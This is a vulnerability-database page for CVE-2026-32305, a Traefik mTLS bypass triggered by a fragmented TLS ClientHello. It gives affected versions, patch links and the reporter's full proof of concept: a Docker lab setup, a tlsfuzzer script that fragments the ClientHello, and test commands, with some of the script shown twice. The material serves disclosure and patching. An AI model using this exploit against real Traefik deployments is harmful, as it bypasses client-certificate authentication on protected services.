        node = node.add_child(ChangeCipherSpecGenerator())
        node = node.add_child(FinishedGenerator())
        node = node.add_child(ExpectChangeCipherSpec())
        node = node.add_child(ExpectFinished())

    else:
        node = node.add_child(ClientKeyExchangeGenerator())
        node = node.add_child(ChangeCipherSpecGenerator())
        node = node.add_child(FinishedGenerator())
        node = node.add_child(ExpectChangeCipherSpec())
        node = node.add_child(ExpectFinished())
        req = bytearray(
            f"GET / HTTP/1.1\r\nHost: {args.sni}\r\nConnection: close\r\n\r\n".encode("ascii")
        )
        node = node.add_child(ApplicationDataGenerator(req))
        node = node.add_child(PrettyExpectApplicationData(output=sys.stdout))
        node = node.add_child(AlertGenerator(AlertLevel.warning, AlertDescription.close_notify))
        node = node.add_child(ExpectAlert())
        node.next_sibling = ExpectClose()

    try:
        Runner(conv).run()
        print("[OK] conversation completed")
    except AssertionError as e:
        print(f"[TLS RAW ERROR] {e}")
        marker = "Unexpected message from peer: "
        s = str(e)
        if marker in s:
            print(f"[TLS PEER MESSAGE] {s.split(marker, 1)[1].strip()}")
        raise


if __name__ == "__main__":
    main()
EOF_FRAG_SCRIPT

chmod +x frag_clienthello.py
cd /tmp/testtlsfuzz/tlsfuzzer
source .venv/bin/activate

# case 1: non fragmented, no client cert (strict mTLS path, should fail. traefik logs should inform that client didn't provide a certificate)
python frag_clienthello.py \
  --connect-host 127.0.0.1 \
  --port 8443 \
  --sni whoami.home.arpa \
  --record-size 16384 \
  --expect-cert-request

# case 1b with openssl instead of my script
printf 'GET / HTTP/1.1\r\nHost: whoami.home.arpa\r\nConnection: close\r\n\r\n' | \
openssl s_client \
  -connect 127.0.0.1:8443 \
  -servername whoami.home.arpa \
  -tls1_2 \
  -CAfile /tmp/traefik-frag-poc/certs/ca.crt \
  -state -msg -tlsextdebug -verify_return_error


# case 2: non fragmented, with valid client cert (should succeed) 
python frag_clienthello.py \
  --connect-host 127.0.0.1 \
  --port 8443 \
  --sni whoami.home.arpa \
  --record-size 16384 \
  --expect-cert-request \
  --client-cert-pem /tmp/traefik-frag-poc/certs/client.crt \
  --client-key-pem /tmp/traefik-frag-poc/certs/client.key

# case 2b with openssl instead of my script
printf 'GET / HTTP/1.1\r\nHost: whoami.home.arpa\r\nConnection: close\r\n\r\n' | \
openssl s_client -connect 127.0.0.1:8443 -servername whoami.home.arpa -tls1_2 \
  -cert /tmp/traefik-frag-poc/certs/client.crt \
  -key /tmp/traefik-frag-poc/certs/client.key \
  -CAfile /tmp/traefik-frag-poc/certs/ca.crt -quiet

# case 3 fragmented ClientHello, no client cert (bypass behavior test)
python frag_clienthello.py \
  --connect-host 127.0.0.1 \
  --port 8443 \
  --sni whoami.home.arpa \
  --record-size 500
# in the record-size you can play with it as long as the client hello sni sniff function returns an EOF

### Impact An attacker can bypass route-level mTLS enforcement by fragmenting ClientHello so Traefik pre-sniff fails (EOF) and falls back to default permissive TLS config.

Severity ?

7.8 (High)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/traefik/traefik/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.7.0-ea.1"
            },
            {
              "fixed": "3.7.0-ea.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.6.10"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/traefik/traefik/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.6.11"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.11.40"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/traefik/traefik/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.11.41"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/traefik/traefik"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.7.34"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-32305"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-20T15:43:01Z",
    "nvd_published_at": "2026-03-20T11:18:02Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThere is a potential vulnerability in Traefik\u0027s TLS SNI pre-sniffing logic related to fragmented ClientHello packets.\n\nWhen a TLS ClientHello is fragmented across multiple records, Traefik\u0027s SNI extraction may fail with an EOF and return an empty SNI. The TCP router then falls back to the default TLS configuration, which does not require client certificates by default. This allows an attacker to bypass route-level mTLS enforcement and access services that should require mutual TLS authentication.\n\n## Patches\n\n- https://github.com/traefik/traefik/releases/tag/v2.11.41\n- https://github.com/traefik/traefik/releases/tag/v3.6.11\n- https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2\n\n## For more information\n\nIf you have any questions or comments about this advisory, please [open an issue](https://github.com/traefik/traefik/issues).\n\n\u003cdetails\u003e\n\u003csummary\u003eOriginal Description\u003c/summary\u003e\n\n### Summary\nI found a behavior in Traefik\u0027s latest version where fragmented ClientHello packets can cause pre-sniff SNI extraction to not find the sni (EOF during sniff), which makes the TCP router fall back to default routing TLS config.\n\nIf the default TLS config does not require client certificates (which is NoClientCert by default), the handshake succeeds without client auth, and the request is later routed to the HTTP Host which should be the protected with client certificate authentication (RequireAndVerifyClientCert tls config).\n\n### Details\nThe vulnerability is caused by a mismatch between where Traefik decides the TLS policy per host and where Go TLS can finally parse the full ClientHello.\n\n1. In router.go, ServeTCP function calls clientHelloInfo.\n2. clientHelloInfo peeks only one TLS record length (recLen) and then peeks exactly 5 + recLen bytes.\nIt runs a temporary TLS parse on those bytes to extract the SNI.\nIf ClientHello is fragmented, pre-sniff may return empty SNI (With fragmentation, first record can be incomplete for full ClientHello parsing).\n4. clientHelloInfo still returns isTLS=true and empty SNI (it thinks there is no sni so it applies the default tls config (Which is by default NoClientCert which is permissive)\n5. Real Go TLS handshake succeeds later without requiring the client cert.\n6. Request is routed to the host that should have been protected.\n\nConditions required for impact:\n- Route-level TLS options enforce mTLS for a host.\n- Default TLS config is weaker (noClientCert, which is the default default).\n- Pre-sniff fails to extract SNI (due to fragmented ClientHello).\n\nA workaround for this is to set the default tls config to RequireAndVerifyClientCert (but then you need to explicitly define for each permissive host the NoClientCert TLS config).\n\nA suggestion to fix is to parse the complete ClientHello before tls config decision (handle multi-record fragmentation).\n\n### PoC\n```python\n# prerequisites (ubuntu/debian, in rhel/fedora you need to run only the install command (dnf) but with \"docker\" instead of docker.io and podman will emulate it)\nsudo apt update\nsudo apt install -y docker.io openssl git python3 python3-venv\nsudo usermod -aG docker \"$USER\"\n# in debian/ubuntu run newgrp docker to apply the new group to the user\n\nmkdir -p /tmp/traefik-frag-poc/{certs,config/dynamic}\ncd /tmp/traefik-frag-poc\n\n# CA\nopenssl genrsa -out certs/ca.key 4096\nopenssl req -x509 -new -nodes -key certs/ca.key -sha256 -days 3650 \\\n  -subj \"/CN=PoC-CA\" -out certs/ca.crt\n\n# Server cert (whoami.home.arpa)\ncat \u003e certs/server.cnf \u003c\u003c\u0027EOF_SERVER_CNF\u0027\n[req]\ndistinguished_name = dn\nreq_extensions = v3_req\nprompt = no\n\n[dn]\nCN = whoami.home.arpa\n\n[v3_req]\nsubjectAltName = @alt_names\n\n[alt_names]\nDNS.1 = whoami.home.arpa\nEOF_SERVER_CNF\n\nopenssl genrsa -out certs/traefik.key 2048\nopenssl req -new -key certs/traefik.key -out certs/traefik.csr -config certs/server.cnf\nopenssl x509 -req -in certs/traefik.csr -CA certs/ca.crt -CAkey certs/ca.key -CAcreateserial \\\n  -out certs/traefik.crt -days 365 -sha256 -extensions v3_req -extfile certs/server.cnf\n\n# Client cert (valid client)\nopenssl genrsa -out certs/client.key 2048\nopenssl req -new -key certs/client.key -subj \"/CN=client1\" -out certs/client.csr\nopenssl x509 -req -in certs/client.csr -CA certs/ca.crt -CAkey certs/ca.key -CAcreateserial \\\n  -out certs/client.crt -days 365 -sha256\n\ncat \u003e config/traefik.yml \u003c\u003c\u0027EOF_TRAEFIK_CFG\u0027\nentryPoints:\n  websecure:\n    address: \":8443\"\n\nproviders:\n  file:\n    directory: /etc/traefik/dynamic\n    watch: true\n\nlog:\n  level: DEBUG\nEOF_TRAEFIK_CFG\n\ncat \u003e config/dynamic/dynamic.yml \u003c\u003c\u0027EOF_DYNAMIC_CFG\u0027\nhttp:\n  routers:\n    whoami:\n      rule: \"Host(`whoami.home.arpa`)\"\n      entryPoints:\n        - websecure\n      service: whoami\n      tls:\n        options: mtls\n\n  services:\n    whoami:\n      loadBalancer:\n        servers:\n          - url: \"http://whoami:80\"\n\ntls:\n  certificates:\n    - certFile: /certs/traefik.crt\n      keyFile: /certs/traefik.key\n\n  options:\n    mtls:\n      clientAuth:\n        caFiles:\n          - /certs/ca.crt\n        clientAuthType: RequireAndVerifyClientCert\nEOF_DYNAMIC_CFG\n\ndocker network create traefik-poc\n\n\n# run a whoami microservice for the bypass demonstration\ndocker run -d \\\n  --name whoami \\\n  --network traefik-poc \\\n  --restart unless-stopped \\\n  traefik/whoami:v1.11.0\n\ndocker run -d \\\n  --name traefik \\\n  --network traefik-poc \\\n  -p 8443:8443 \\\n  --restart unless-stopped \\\n  -v \"$PWD/config/traefik.yml:/etc/traefik/traefik.yml:ro,Z\" \\\n  -v \"$PWD/config/dynamic:/etc/traefik/dynamic:ro,Z\" \\\n  -v \"$PWD/certs:/certs:ro,Z\" \\\n  traefik:3.6.10 \\\n  --configFile=/etc/traefik/traefik.yml\n\n# watch traefik logs to ensure everything was deployed correctly\ndocker logs traefik\n\n# tlsfuzzer setup + frag client script\n\nmkdir -p /tmp/testtlsfuzz\ncd /tmp/testtlsfuzz\ngit clone https://github.com/tlsfuzzer/tlsfuzzer.git\ncd tlsfuzzer\n\npython3 -m venv .venv\nsource .venv/bin/activate\npip install -r requirements.txt\n\ncat \u003e frag_clienthello.py \u003c\u003c\u0027EOF_FRAG_SCRIPT\u0027\nimport argparse\nimport sys\nimport os\n\nfrom tlsfuzzer.runner import Runner\nfrom tlsfuzzer.messages import (\n    Connect,\n    SetMaxRecordSize,\n    ClientHelloGenerator,\n    CertificateGenerator,\n    CertificateVerifyGenerator,\n    ClientKeyExchangeGenerator,\n    ChangeCipherSpecGenerator,\n    FinishedGenerator,\n    ApplicationDataGenerator,\n    AlertGenerator,\n)\nfrom tlsfuzzer.expect import (\n    ExpectServerHello,\n    ExpectCertificate,\n    ExpectServerKeyExchange,\n    ExpectCertificateRequest,\n    ExpectServerHelloDone,\n    ExpectChangeCipherSpec,\n    ExpectFinished,\n    ExpectApplicationData,\n    ExpectAlert,\n    ExpectClose,\n)\nfrom tlsfuzzer.helpers import SIG_ALL\nfrom tlslite.constants import (\n    CipherSuite,\n    ExtensionType,\n    AlertLevel,\n    AlertDescription,\n    GroupName,\n)\nfrom tlslite.extensions import (\n    SNIExtension,\n    TLSExtension,\n    SupportedGroupsExtension,\n    SignatureAlgorithmsExtension,\n    SignatureAlgorithmsCertExtension,\n)\nfrom tlslite.utils.keyfactory import parsePEMKey\nfrom tlslite.x509 import X509\nfrom tlslite.x509certchain import X509CertChain\n\n\nclass PrettyExpectApplicationData(ExpectApplicationData):\n    def process(self, state, msg):\n        super().process(state, msg)\n        text = msg.write().decode(\"utf-8\", errors=\"replace\")\n        head, _, body = text.partition(\"\\r\\n\\r\\n\")\n        print(\"\\n=== HTTP RESPONSE ===\")\n        print(head)\n        print()\n        print(body)\n        print(\"=== END HTTP RESPONSE ===\\n\")\n\n\ndef load_client_cert_and_key(cert_path, key_path):\n    cert = None\n    key = None\n\n    if cert_path:\n        text_cert = open(cert_path, \"rb\").read()\n        if sys.version_info[0] \u003e= 3:\n            text_cert = str(text_cert, \"utf-8\")\n        cert = X509()\n        cert.parse(text_cert)\n\n    if key_path:\n        text_key = open(key_path, \"rb\").read()\n        if sys.version_info[0] \u003e= 3:\n            text_key = str(text_key, \"utf-8\")\n        key = parsePEMKey(text_key, private=True)\n\n    return cert, key\n\n\ndef main():\n    p = argparse.ArgumentParser()\n    p.add_argument(\"--connect-host\", default=\"127.0.0.1\")\n    p.add_argument(\"--port\", type=int, default=8443)\n    p.add_argument(\"--sni\", default=\"whoami.home.arpa\")\n    p.add_argument(\"--record-size\", type=int, default=512)\n    p.add_argument(\"--padding-len\", type=int, default=1200)\n    p.add_argument(\"--expect-cert-request\", action=\"store_true\")\n    p.add_argument(\"--client-cert-pem\", default=\"\")\n    p.add_argument(\"--client-key-pem\", default=\"\")\n    args = p.parse_args()\n\n    cert, key = load_client_cert_and_key(args.client_cert_pem, args.client_key_pem)\n\n    print(f\"[DBG] cert_arg={args.client_cert_pem!r} key_arg={args.client_key_pem!r}\")\n    for p in [args.client_cert_pem, args.client_key_pem]:\n        if p:\n            print(f\"[DBG] file={p} exists={os.path.exists(p)} size={os.path.getsize(p) if os.path.exists(p) else -1}\")\n\n    print(f\"[DBG] cert_loaded={cert is not None} key_loaded={key is not None}\")\n    print(f\"[DBG] bool(cert)={bool(cert) if cert is not None else None} bool(key)={bool(key) if key is not None else None}\")\n\n\n    if (args.client_cert_pem or args.client_key_pem) and not (cert and key):\n        raise ValueError(\"Provide both --client-cert-pem and --client-key-pem\")\n\n    conv = Connect(args.connect_host, args.port)\n    node = conv\n    node = node.add_child(SetMaxRecordSize(args.record_size))\n\n    ext = {\n        ExtensionType.server_name: SNIExtension().create(bytearray(args.sni, \"ascii\")),\n        ExtensionType.supported_groups: SupportedGroupsExtension().create(\n            [GroupName.secp256r1, GroupName.ffdhe2048]\n        ),\n        ExtensionType.signature_algorithms: SignatureAlgorithmsExtension().create(SIG_ALL),\n        ExtensionType.signature_algorithms_cert: SignatureAlgorithmsCertExtension().create(SIG_ALL),\n        21: TLSExtension().create(21, bytearray(args.padding_len)),\n    }\n\n    ciphers = [\n        CipherSuite.TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256,\n        CipherSuite.TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA,\n        CipherSuite.TLS_DHE_RSA_WITH_AES_128_CBC_SHA,\n        CipherSuite.TLS_EMPTY_RENEGOTIATION_INFO_SCSV,\n    ]\n\n    node = node.add_child(ClientHelloGenerator(ciphers, extensions=ext))\n    node = node.add_child(ExpectServerHello())\n    node = node.add_child(ExpectCertificate())\n    node = node.add_child(ExpectServerKeyExchange())\n\n    if args.expect_cert_request:\n        node = node.add_child(ExpectCertificateRequest())\n\n    node = node.add_child(ExpectServerHelloDone())\n\n    if args.expect_cert_request and cert and key:\n        node = node.add_child(CertificateGenerator(X509CertChain([cert])))\n        node = node.add_child(ClientKeyExchangeGenerator())\n        node = node.add_child(CertificateVerifyGenerator(key))\n        node = node.add_child(ChangeCipherSpecGenerator())\n        node = node.add_child(FinishedGenerator())\n        node = node.add_child(ExpectChangeCipherSpec())\n        node = node.add_child(ExpectFinished())\n        req = bytearray(\n            f\"GET / HTTP/1.1\\r\\nHost: {args.sni}\\r\\nConnection: close\\r\\n\\r\\n\".encode(\"ascii\")\n        )\n        node = node.add_child(ApplicationDataGenerator(req))\n        node = node.add_child(PrettyExpectApplicationData(output=sys.stdout))\n        node = node.add_child(AlertGenerator(AlertLevel.warning, AlertDescription.close_notify))\n        node = node.add_child(ExpectAlert())\n        node.next_sibling = ExpectClose()\n\n    elif args.expect_cert_request and not (cert and key):\n        node = node.add_child(CertificateGenerator())\n        node = node.add_child(ClientKeyExchangeGenerator())\n        node = node.add_child(ChangeCipherSpecGenerator())\n        node = node.add_child(FinishedGenerator())\n        node = node.add_child(ExpectChangeCipherSpec())\n        node = node.add_child(ExpectFinished())\n\n    else:\n        node = node.add_child(ClientKeyExchangeGenerator())\n        node = node.add_child(ChangeCipherSpecGenerator())\n        node = node.add_child(FinishedGenerator())\n        node = node.add_child(ExpectChangeCipherSpec())\n        node = node.add_child(ExpectFinished())\n        req = bytearray(\n            f\"GET / HTTP/1.1\\r\\nHost: {args.sni}\\r\\nConnection: close\\r\\n\\r\\n\".encode(\"ascii\")\n        )\n        node = node.add_child(ApplicationDataGenerator(req))\n        node = node.add_child(PrettyExpectApplicationData(output=sys.stdout))\n        node = node.add_child(AlertGenerator(AlertLevel.warning, AlertDescription.close_notify))\n        node = node.add_child(ExpectAlert())\n        node.next_sibling = ExpectClose()\n\n    try:\n        Runner(conv).run()\n        print(\"[OK] conversation completed\")\n    except AssertionError as e:\n        print(f\"[TLS RAW ERROR] {e}\")\n        marker = \"Unexpected message from peer: \"\n        s = str(e)\n        if marker in s:\n            print(f\"[TLS PEER MESSAGE] {s.split(marker, 1)[1].strip()}\")\n        raise\n\n\nif __name__ == \"__main__\":\n    main()\nEOF_FRAG_SCRIPT\n\nchmod +x frag_clienthello.py\ncd /tmp/testtlsfuzz/tlsfuzzer\nsource .venv/bin/activate\n\n# case 1: non fragmented, no client cert (strict mTLS path, should fail. traefik logs should inform that client didn\u0027t provide a certificate)\npython frag_clienthello.py \\\n  --connect-host 127.0.0.1 \\\n  --port 8443 \\\n  --sni whoami.home.arpa \\\n  --record-size 16384 \\\n  --expect-cert-request\n\n# case 1b with openssl instead of my script\nprintf \u0027GET / HTTP/1.1\\r\\nHost: whoami.home.arpa\\r\\nConnection: close\\r\\n\\r\\n\u0027 | \\\nopenssl s_client \\\n  -connect 127.0.0.1:8443 \\\n  -servername whoami.home.arpa \\\n  -tls1_2 \\\n  -CAfile /tmp/traefik-frag-poc/certs/ca.crt \\\n  -state -msg -tlsextdebug -verify_return_error\n\n\n# case 2: non fragmented, with valid client cert (should succeed) \npython frag_clienthello.py \\\n  --connect-host 127.0.0.1 \\\n  --port 8443 \\\n  --sni whoami.home.arpa \\\n  --record-size 16384 \\\n  --expect-cert-request \\\n  --client-cert-pem /tmp/traefik-frag-poc/certs/client.crt \\\n  --client-key-pem /tmp/traefik-frag-poc/certs/client.key\n\n# case 2b with openssl instead of my script\nprintf \u0027GET / HTTP/1.1\\r\\nHost: whoami.home.arpa\\r\\nConnection: close\\r\\n\\r\\n\u0027 | \\\nopenssl s_client -connect 127.0.0.1:8443 -servername whoami.home.arpa -tls1_2 \\\n  -cert /tmp/traefik-frag-poc/certs/client.crt \\\n  -key /tmp/traefik-frag-poc/certs/client.key \\\n  -CAfile /tmp/traefik-frag-poc/certs/ca.crt -quiet\n\n# case 3 fragmented ClientHello, no client cert (bypass behavior test)\npython frag_clienthello.py \\\n  --connect-host 127.0.0.1 \\\n  --port 8443 \\\n  --sni whoami.home.arpa \\\n  --record-size 500\n# in the record-size you can play with it as long as the client hello sni sniff function returns an EOF\n```\n\n### Impact\nAn attacker can bypass route-level mTLS enforcement by fragmenting ClientHello so Traefik pre-sniff fails (EOF) and falls back to default permissive TLS config.\n\n\u003c/details\u003e\n\n--",
  "id": "GHSA-wvvq-wgcr-9q48",
  "modified": "2026-03-20T15:43:01Z",
  "published": "2026-03-20T15:43:01Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/security/advisories/GHSA-wvvq-wgcr-9q48"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32305"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/traefik/traefik"
    },
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/releases/tag/v2.11.41"
    },
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/releases/tag/v3.6.11"
    },
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Traefik has a Potential mTLS Bypass via Fragmented TLS ClientHello Causing Pre-SNI Sniff Fallback to Default Non-mTLS TLS Config"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-32305 (GCVE-0-2026-32305)

CERTFR-2026-AVI-0333

Solutions

FKIE_CVE-2026-32305

GHSA-WVVQ-WGCR-9Q48

Summary

Patches

For more information

Tags

Sightings

Nomenclature